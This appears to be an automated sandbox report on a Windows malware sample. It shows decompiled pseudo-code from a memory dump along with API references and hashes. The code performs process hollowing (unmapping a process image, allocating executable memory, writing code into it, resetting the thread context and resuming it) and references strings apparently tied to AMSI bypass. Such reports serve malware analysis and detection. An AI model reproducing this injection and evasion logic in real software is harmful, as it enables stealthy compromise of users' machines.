                                                                                                									_pop(_t550);
                                                                                                									E02183690(_v84, _t494, _t550, 0);
                                                                                                									_t255 =  *0x21943f8; // 0x0
                                                                                                									_t257 = 0x2194300->hProcess; // 0x0
                                                                                                									ReadProcessMemory(_t257, _t255 + 8, 0x2194428, 4, 0x2194430);
                                                                                                									_t259 =  *0x2194424; // 0x0
                                                                                                									_t634 =  *((intOrPtr*)(_t259 + 0x34)) -  *0x2194428; // 0x0
                                                                                                									if(_t634 != 0) {
                                                                                                										_t261 =  *0x2194424; // 0x0
                                                                                                										_t263 =  *0x2194424; // 0x0
                                                                                                										_t265 = 0x2194300->hProcess; // 0x0
                                                                                                										 *0x219442c = VirtualAllocEx(_t265,  *(_t263 + 0x34),  *(_t261 + 0x50), 0x3000, 0x40);
                                                                                                									} else {
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v92, E02174D64(_v96));
                                                                                                										_push(_v92);
                                                                                                										_t517 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v104, _t517, 0x2184460);
                                                                                                										E02174A98( &_v100, E02174D64(_v104));
                                                                                                										_pop(_t613);
                                                                                                										E02183690(_v100, _t494, _t613, 0);
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v108, E02174D64(_v112));
                                                                                                										_push(_v108);
                                                                                                										_t518 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v120, _t518, 0x2184460);
                                                                                                										E02174A98( &_v116, E02174D64(_v120));
                                                                                                										_pop(_t618);
                                                                                                										E02183690(_v116, _t494, _t618, 0);
                                                                                                										_t477 =  *0x2194424; // 0x0
                                                                                                										_t479 = 0x2194300->hProcess; // 0x0
                                                                                                										if(NtUnmapViewOfSection(_t479,  *(_t477 + 0x34)) != 0) {
                                                                                                											_t481 =  *0x2194424; // 0x0
                                                                                                											_t483 = 0x2194300->hProcess; // 0x0
                                                                                                											 *0x219442c = VirtualAllocEx(_t483, 0,  *(_t481 + 0x50), 0x3000, 0x40);
                                                                                                										} else {
                                                                                                											_t485 =  *0x2194424; // 0x0
                                                                                                											_t487 =  *0x2194424; // 0x0
                                                                                                											_t489 = 0x2194300->hProcess; // 0x0
                                                                                                											 *0x219442c = VirtualAllocEx(_t489,  *(_t487 + 0x34),  *(_t485 + 0x50), 0x3000, 0x40);
                                                                                                										}
                                                                                                									}
                                                                                                									if( *0x219442c != 0) {
                                                                                                										_t495 = E021838A0(_t494, _t641);
                                                                                                										_t269 =  *0x2194424; // 0x0
                                                                                                										_t637 =  *((intOrPtr*)(_t269 + 0x34)) -  *0x219442c; // 0x0
                                                                                                										if(_t637 != 0) {
                                                                                                											_push(0x2184460);
                                                                                                											_push( *0x2194438);
                                                                                                											_push("ScanBuffer");
                                                                                                											E02174C24();
                                                                                                											E02174A98( &_v124, E02174D64(_v128));
                                                                                                											_push(_v124);
                                                                                                											_t512 =  *0x2194438; // 0x0
                                                                                                											E02174BB0( &_v136, _t512, 0x2184460);
                                                                                                											E02174A98( &_v132, E02174D64(_v136));
                                                                                                											_pop(_t588);
                                                                                                											E02183690(_v132, _t495, _t588, 0);
                                                                                                											_push(0x2184460);
                                                                                                											_push( *0x2194438);
                                                                                                											_push("OpenSession");
                                                                                                											E02174C24();
                                                                                                											E02174A98( &_v140, E02174D64(_v144));
                                                                                                											_push(_v140);
                                                                                                											_t513 =  *0x2194438; // 0x0
                                                                                                											E02174BB0( &_v152, _t513, 0x2184460);
                                                                                                											E02174A98( &_v148, E02174D64(_v152));
                                                                                                											_pop(_t593);
                                                                                                											E02183690(_v148, _t495, _t593, 0);
                                                                                                											_t412 =  *0x2194424; // 0x0
                                                                                                											_t594 =  *0x219442c; // 0x0
                                                                                                											_t413 =  *0x2194424; // 0x0
                                                                                                											E02183798(_t641, _t495, _t413, _t594 -  *((intOrPtr*)(_t412 + 0x34)));
                                                                                                											_t415 =  *0x2194424; // 0x0
                                                                                                											_t596 =  *0x219442c; // 0x0
                                                                                                											 *(_t415 + 0x34) = _t596;
                                                                                                											_push(0x2184460);
                                                                                                											_push( *0x2194438);
                                                                                                											_push("ScanBuffer");
                                                                                                											E02174C24();
                                                                                                											E02174A98( &_v156, E02174D64(_v160));
                                                                                                											_push(_v156);
                                                                                                											_t514 =  *0x2194438; // 0x0
                                                                                                											E02174BB0( &_v168, _t514, 0x2184460);
                                                                                                											E02174A98( &_v164, E02174D64(_v168));
                                                                                                											_pop(_t601);
                                                                                                											E02183690(_v164, _t495, _t601, 0);
                                                                                                											_push(0x2184460);
                                                                                                											_push( *0x2194438);
                                                                                                											_push("OpenSession");
                                                                                                											E02174C24();
                                                                                                											E02174A98( &_v172, E02174D64(_v176));
                                                                                                											_push(_v172);
                                                                                                											_t515 =  *0x2194438; // 0x0
                                                                                                											E02174BB0( &_v184, _t515, 0x2184460);
                                                                                                											E02174A98( &_v180, E02174D64(_v184));
                                                                                                											_pop(_t606);
                                                                                                											E02183690(_v180, _t495, _t606, 0);
                                                                                                											_push(0);
                                                                                                											_push(_t495);
                                                                                                											_t445 =  *0x2194420; // 0x0
                                                                                                											asm("cdq");
                                                                                                											asm("adc edx, [esp+0x4]");
                                                                                                											_t608 =  *0x2194424; // 0x0
                                                                                                											E02176A40( *((intOrPtr*)(_t445 + 0x3c)) + _v164, _t608);
                                                                                                										}
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v188, E02174D64(_v192));
                                                                                                										_push(_v188);
                                                                                                										_t506 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v200, _t506, 0x2184460);
                                                                                                										E02174A98( &_v196, E02174D64(_v200));
                                                                                                										_pop(_t555);
                                                                                                										E02183690(_v196, _t495, _t555, 0);
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v204, E02174D64(_v208));
                                                                                                										_push(_v204);
                                                                                                										_t507 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v216, _t507, 0x2184460);
                                                                                                										E02174A98( &_v212, E02174D64(_v216));
                                                                                                										_pop(_t560);
                                                                                                										E02183690(_v212, _t495, _t560, 0);
                                                                                                										E02174A98( &_v220, "KernelBase");
                                                                                                										 *0x2194468 = E0217CAC8(_v220, _t495, 0x8000);
                                                                                                										_t303 =  *0x2194468; // 0x0
                                                                                                										 *0x219446c = GetProcAddress(_t303, "WriteProcessMemory");
                                                                                                										_t305 =  *0x2194468; // 0x0
                                                                                                										FreeLibrary(_t305);
                                                                                                										_t307 =  *0x2194424; // 0x0
                                                                                                										_t309 =  *0x219442c; // 0x0
                                                                                                										_t310 = 0x2194300->hProcess; // 0x0
                                                                                                										 *0x219446c(_t310, _t309, _t495,  *((intOrPtr*)(_t307 + 0x50)), 0x2194430);
                                                                                                										_t312 =  *0x2194430; // 0x0
                                                                                                										_t313 =  *0x2194424; // 0x0
                                                                                                										_t315 =  *0x219442c; // 0x0
                                                                                                										_t316 = 0x2194300->hProcess; // 0x0
                                                                                                										NtProtectVirtualMemory(_t316, _t315,  *(_t313 + 0x50), 1, _t312);
                                                                                                										_t318 =  *0x2194424; // 0x0
                                                                                                										 *0x2194404 =  *((intOrPtr*)(_t318 + 0x28)) +  *0x219442c;
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v224, E02174D64(_v228));
                                                                                                										_push(_v224);
                                                                                                										_t508 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v236, _t508, 0x2184460);
                                                                                                										E02174A98( &_v232, E02174D64(_v236));
                                                                                                										_pop(_t567);
                                                                                                										E02183690(_v232, _t495, _t567, 0);
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v240, E02174D64(_v244));
                                                                                                										_push(_v240);
                                                                                                										_t509 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v252, _t509, 0x2184460);
                                                                                                										E02174A98( &_v248, E02174D64(_v252));
                                                                                                										_pop(_t572);
                                                                                                										E02183690(_v248, _t495, _t572, 0);
                                                                                                										_t349 =  *0x2194304; // 0x0
                                                                                                										SetThreadContext(_t349, 0x2194354);
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v256, E02174D64(_v260));
                                                                                                										_push(_v256);
                                                                                                										_t510 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v268, _t510, 0x2184460);
                                                                                                										E02174A98( &_v264, E02174D64(_v268));
                                                                                                										_pop(_t577);
                                                                                                										E02183690(_v264, _t495, _t577, 0);
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v272, E02174D64(_v276));
                                                                                                										_push(_v272);
                                                                                                										_t511 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v284, _t511, 0x2184460);
                                                                                                										E02174A98( &_v280, E02174D64(_v284));
                                                                                                										_pop(_t582);
                                                                                                										E02183690(_v280, _t495, _t582, 0);
                                                                                                										_t379 =  *0x2194304; // 0x0
                                                                                                										NtResumeThread(_t379);
                                                                                                										E02172C5C(_t495);
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					goto L19;
                                                                                                				}
                                                                                                			}
                                                                                                0x02183e3c
                                                                                                0x02183e42
                                                                                                0x02183e48
                                                                                                0x02183e4d
                                                                                                0x02183e53
                                                                                                0x02183e60
                                                                                                0x02183e72
                                                                                                0x02183e7a
                                                                                                0x02183e81
                                                                                                0x02183e8c
                                                                                                0x02183ea1
                                                                                                0x02183ea9
                                                                                                0x02183eaa
                                                                                                0x02183eaf
                                                                                                0x02183eb4
                                                                                                0x02183eba
                                                                                                0x02183eca
                                                                                                0x02183ee2
                                                                                                0x02183eed
                                                                                                0x02183ef4
                                                                                                0x02183eff
                                                                                                0x02183f17
                                                                                                0x02183f22
                                                                                                0x02183f23
                                                                                                0x02183f28
                                                                                                0x02183f2d
                                                                                                0x02183f37
                                                                                                0x02183f3e
                                                                                                0x02183f43
                                                                                                0x02183f48
                                                                                                0x02183f4e
                                                                                                0x02183f51
                                                                                                0x02183f56
                                                                                                0x02183f5c
                                                                                                0x02183f6c
                                                                                                0x02183f84
                                                                                                0x02183f8f
                                                                                                0x02183f96
                                                                                                0x02183fa1
                                                                                                0x02183fb9
                                                                                                0x02183fc4
                                                                                                0x02183fc5
                                                                                                0x02183fca
                                                                                                0x02183fcf
                                                                                                0x02183fd5
                                                                                                0x02183fe5
                                                                                                0x02183ffd
                                                                                                0x02184008
                                                                                                0x0218400f
                                                                                                0x0218401a
                                                                                                0x02184032
                                                                                                0x0218403d
                                                                                                0x0218403e
                                                                                                0x02184047
                                                                                                0x02184048
                                                                                                0x02184049
                                                                                                0x02184051
                                                                                                0x02184055
                                                                                                0x02184061
                                                                                                0x02184067
                                                                                                0x02184067
                                                                                                0x0218406c
                                                                                                0x02184071
                                                                                                0x02184077
                                                                                                0x02184087
                                                                                                0x0218409f
                                                                                                0x021840aa
                                                                                                0x021840b1
                                                                                                0x021840bc
                                                                                                0x021840d4
                                                                                                0x021840df
                                                                                                0x021840e0
                                                                                                0x021840e5
                                                                                                0x021840ea
                                                                                                0x021840f0
                                                                                                0x02184100
                                                                                                0x02184118
                                                                                                0x02184123
                                                                                                0x0218412a
                                                                                                0x02184135
                                                                                                0x0218414d
                                                                                                0x02184158
                                                                                                0x02184159
                                                                                                0x02184169
                                                                                                0x0218417e
                                                                                                0x02184188
                                                                                                0x02184193
                                                                                                0x02184198
                                                                                                0x0218419e
                                                                                                0x021841a8
                                                                                                0x021841b2
                                                                                                0x021841b8
                                                                                                0x021841be
                                                                                                0x021841c4
                                                                                                0x021841cc
                                                                                                0x021841d5
                                                                                                0x021841db
                                                                                                0x021841e1
                                                                                                0x021841e6
                                                                                                0x021841f4
                                                                                                0x021841f9
                                                                                                0x021841fe
                                                                                                0x02184204
                                                                                                0x02184214
                                                                                                0x0218422c
                                                                                                0x02184237
                                                                                                0x0218423e
                                                                                                0x02184249
                                                                                                0x02184261
                                                                                                0x0218426c
                                                                                                0x0218426d
                                                                                                0x02184272
                                                                                                0x02184277
                                                                                                0x0218427d
                                                                                                0x0218428d
                                                                                                0x021842a5
                                                                                                0x021842b0
                                                                                                0x021842b7
                                                                                                0x021842c2
                                                                                                0x021842da
                                                                                                0x021842e5
                                                                                                0x021842e6
                                                                                                0x021842f0
                                                                                                0x021842f6
                                                                                                0x021842fb
                                                                                                0x02184300
                                                                                                0x02184306
                                                                                                0x02184316
                                                                                                0x0218432e
                                                                                                0x02184339
                                                                                                0x02184340
                                                                                                0x0218434b
                                                                                                0x02184363
                                                                                                0x0218436e
                                                                                                0x0218436f
                                                                                                0x02184374
                                                                                                0x02184379
                                                                                                0x0218437f
                                                                                                0x0218438f
                                                                                                0x021843a7
                                                                                                0x021843b2
                                                                                                0x021843b9
                                                                                                0x021843c4
                                                                                                0x021843dc
                                                                                                0x021843e7
                                                                                                0x021843e8
                                                                                                0x021843ed
                                                                                                0x021843f3
                                                                                                0x02184402
                                                                                                0x02184407
                                                                                                0x02183e25
                                                                                                0x02183bd0
                                                                                                0x02183bae
                                                                                                0x02183a92
                                                                                                0x00000000
                                                                                                0x02183a63

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218442B,?,?,?,00000000,00000000), ref: 021839C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InetOffline
                                                                                                • String ID: KernelBase$OpenSession$ScanBuffer$WriteProcessMemory$teSe
                                                                                                • API String ID: 3180263700-3519499064
                                                                                                • Opcode ID: 910b69e5aee5ebdd78829a08240ce8794875c19dd522cddde2742c75d54f63de
                                                                                                • Instruction ID: 97eedd5c610bb314a9352192945d45e6c57cb810e047b11b402a7aaa954ebb3b
                                                                                                • Opcode Fuzzy Hash: 910b69e5aee5ebdd78829a08240ce8794875c19dd522cddde2742c75d54f63de
                                                                                                • Instruction Fuzzy Hash: C0420F75AC0209DFEB21FB64E980FDE73FAAB85700F5184A5A505A7200DF70AE86CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 83%
                                                                                                			E02175B48(CHAR* __eax, int __edx) {
                                                                                                				CHAR* _v8;
                                                                                                				int _v12;
                                                                                                				CHAR* _v16;
                                                                                                				void* _v20;
                                                                                                				struct _WIN32_FIND_DATAA _v338;
                                                                                                				char _v599;
                                                                                                				void* _t102;
                                                                                                				intOrPtr* _t103;
                                                                                                				CHAR* _t106;
                                                                                                				CHAR* _t108;
                                                                                                				char* _t109;
                                                                                                				void* _t110;
                                                                                                
                                                                                                				_v12 = __edx;
                                                                                                				_v8 = __eax;
                                                                                                				_v16 = _v8;
                                                                                                				_v20 = GetModuleHandleA("kernel32.dll");
                                                                                                				if(_v20 == 0) {
                                                                                                					L4:
                                                                                                					if( *_v8 != 0x5c) {
                                                                                                						_t108 =  &(_v8[2]);
                                                                                                						goto L10;
                                                                                                					} else {
                                                                                                						if(_v8[1] == 0x5c) {
                                                                                                							_t109 = E02175B28( &(_v8[2]));
                                                                                                							if( *_t109 != 0) {
                                                                                                								_t17 = _t109 + 1; // 0x1
                                                                                                								_t108 = E02175B28(_t17);
                                                                                                								if( *_t108 != 0) {
                                                                                                									L10:
                                                                                                									_t102 = _t108 - _v8;
                                                                                                									lstrcpynA( &_v599, _v8, _t102 + 1);
                                                                                                									while( *_t108 != 0) {
                                                                                                										_t106 = E02175B28( &(_t108[1]));
                                                                                                										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
                                                                                                											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
                                                                                                											_v20 = FindFirstFileA( &_v599,  &_v338);
                                                                                                											if(_v20 != 0xffffffff) {
                                                                                                												FindClose(_v20);
                                                                                                												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
                                                                                                													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
                                                                                                													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
                                                                                                													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
                                                                                                													_t108 = _t106;
                                                                                                													continue;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                										goto L17;
                                                                                                									}
                                                                                                									lstrcpynA(_v8,  &_v599, _v12);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
                                                                                                					if(_t103 == 0) {
                                                                                                						goto L4;
                                                                                                					} else {
                                                                                                						_push(0x105);
                                                                                                						_push( &_v599);
                                                                                                						_push(_v8);
                                                                                                						if( *_t103() == 0) {
                                                                                                							goto L4;
                                                                                                						} else {
                                                                                                							lstrcpynA(_v8,  &_v599, _v12);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L17:
                                                                                                				return _v16;
                                                                                                			}
















                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,02176ED0,02170000,021907B4), ref: 02175B65
                                                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02175B7C
                                                                                                • lstrcpynA.KERNEL32(?,?,?), ref: 02175BAC
                                                                                                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C10
                                                                                                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C46
                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C59
                                                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C6B
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C77
                                                                                                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000), ref: 02175CAB
                                                                                                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0), ref: 02175CB7
                                                                                                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02175CD9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                • API String ID: 3245196872-1565342463
                                                                                                • Opcode ID: b79d9f7d4cd7dc8ec1285aa365259b8e879f6b419a8673a1863e6a0522ef51ca
                                                                                                • Instruction ID: 6358e87a6c7b163e6f97be597ec38de9c9273947e908e07557965429cca35145
                                                                                                • Opcode Fuzzy Hash: b79d9f7d4cd7dc8ec1285aa365259b8e879f6b419a8673a1863e6a0522ef51ca
                                                                                                • Instruction Fuzzy Hash: BB413171D8065CBFDB20DEE8CC88BEEB7BEAB88340F5445A5A949D7241D7709E848F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02175E18() {
                                                                                                				void* _t32;
                                                                                                				CHAR* _t56;
                                                                                                				CHAR* _t57;
                                                                                                				struct HINSTANCE__* _t64;
                                                                                                				void* _t66;
                                                                                                
                                                                                                				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
                                                                                                				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
                                                                                                				_t64 = 0;
                                                                                                				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
                                                                                                					L14:
                                                                                                					return _t64;
                                                                                                				} else {
                                                                                                					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
                                                                                                					L5:
                                                                                                					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
                                                                                                						_t56 = _t56 - 1;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                					_t32 = _t66 - 0x11d;
                                                                                                					if(_t56 != _t32) {
                                                                                                						_t57 =  &(_t56[1]);
                                                                                                						if( *(_t66 - 0x12) != 0) {
                                                                                                							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
                                                                                                							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                                                						}
                                                                                                						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
                                                                                                							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                                                                                                							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                                                							if(_t64 == 0) {
                                                                                                								 *((char*)(_t66 - 0xb)) = 0;
                                                                                                								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                                                                                                								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					goto L14;
                                                                                                				}
                                                                                                			}









                                                                                                APIs
                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02175E28
                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02175E35
                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02175E3B
                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02175E66
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02175EAD
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02175EBD
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02175EE5
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02175EF5
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02175F1B
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02175F2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                • API String ID: 1599918012-2375825460
                                                                                                • Opcode ID: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
                                                                                                • Instruction ID: 8a02a480dd8b8b5114be851cce83bed8d61c7fd6e40b77c03ff5c47e0c0698d1
                                                                                                • Opcode Fuzzy Hash: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
                                                                                                • Instruction Fuzzy Hash: EE318471EC025C3EFB25D6B49C85FDEB7BE8B84380F5401A1AA48E6181EB74DE848F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 56%
                                                                                                			E02185A40(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                				long _v8;
                                                                                                				char _v12;
                                                                                                				char _v16;
                                                                                                				intOrPtr _t11;
                                                                                                				char _t16;
                                                                                                				void* _t25;
                                                                                                				intOrPtr _t33;
                                                                                                				void* _t36;
                                                                                                				void* _t38;
                                                                                                				intOrPtr _t41;
                                                                                                
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_t25 = __edx;
                                                                                                				_t38 = __eax;
                                                                                                				_push(_t41);
                                                                                                				_push(0x2185ac6);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t41;
                                                                                                				E02174A98( &_v12, __edx);
                                                                                                				_t11 = _v12;
                                                                                                				if(_t11 != 0) {
                                                                                                					_t11 =  *((intOrPtr*)(_t11 - 4));
                                                                                                				}
                                                                                                				_t36 = VirtualAllocEx(_t38, 0, _t11 + 1, 0x3000, 0x40);
                                                                                                				E02174A98( &_v16, _t25);
                                                                                                				_t16 = _v16;
                                                                                                				if(_t16 != 0) {
                                                                                                					_t16 =  *((intOrPtr*)(_t16 - 4));
                                                                                                				}
                                                                                                				WriteProcessMemory(_t38, _t36, _t25, _t16 + 1,  &_v8);
                                                                                                				_pop(_t33);
                                                                                                				 *[fs:eax] = _t33;
                                                                                                				_push(E02185ACD);
                                                                                                				return E021748C4( &_v16, 2);
                                                                                                			}














                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02185AC6,?,?,?,?,00000000,00000000,00000000), ref: 02185A80
                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02185AC6), ref: 02185AA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                                                • String ID:
                                                                                                • API String ID: 645232735-0
                                                                                                • Opcode ID: f0c72c3926a60469874caca1a198ae091c4d39ea6cf505dfd8413f0cd3daf931
                                                                                                • Instruction ID: 21f877b95eb6256e588f094d843f4aafe8c6991cb1de780df5f62e7c4ead23e2
                                                                                                • Opcode Fuzzy Hash: f0c72c3926a60469874caca1a198ae091c4d39ea6cf505dfd8413f0cd3daf931
                                                                                                • Instruction Fuzzy Hash: 44019E757802487FF711EA658CC1F6AB7BEDB85B04F9144B5F901E7280DB70EE048A24
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217823C(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                				long _v8;
                                                                                                				long _v12;
                                                                                                				long _v16;
                                                                                                				long _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				signed int _v28;
                                                                                                				CHAR* _t25;
                                                                                                				int _t26;
                                                                                                				intOrPtr _t31;
                                                                                                				intOrPtr _t34;
                                                                                                				intOrPtr* _t37;
                                                                                                				intOrPtr* _t38;
                                                                                                				intOrPtr _t46;
                                                                                                				intOrPtr _t48;
                                                                                                
                                                                                                				_t25 = _a4;
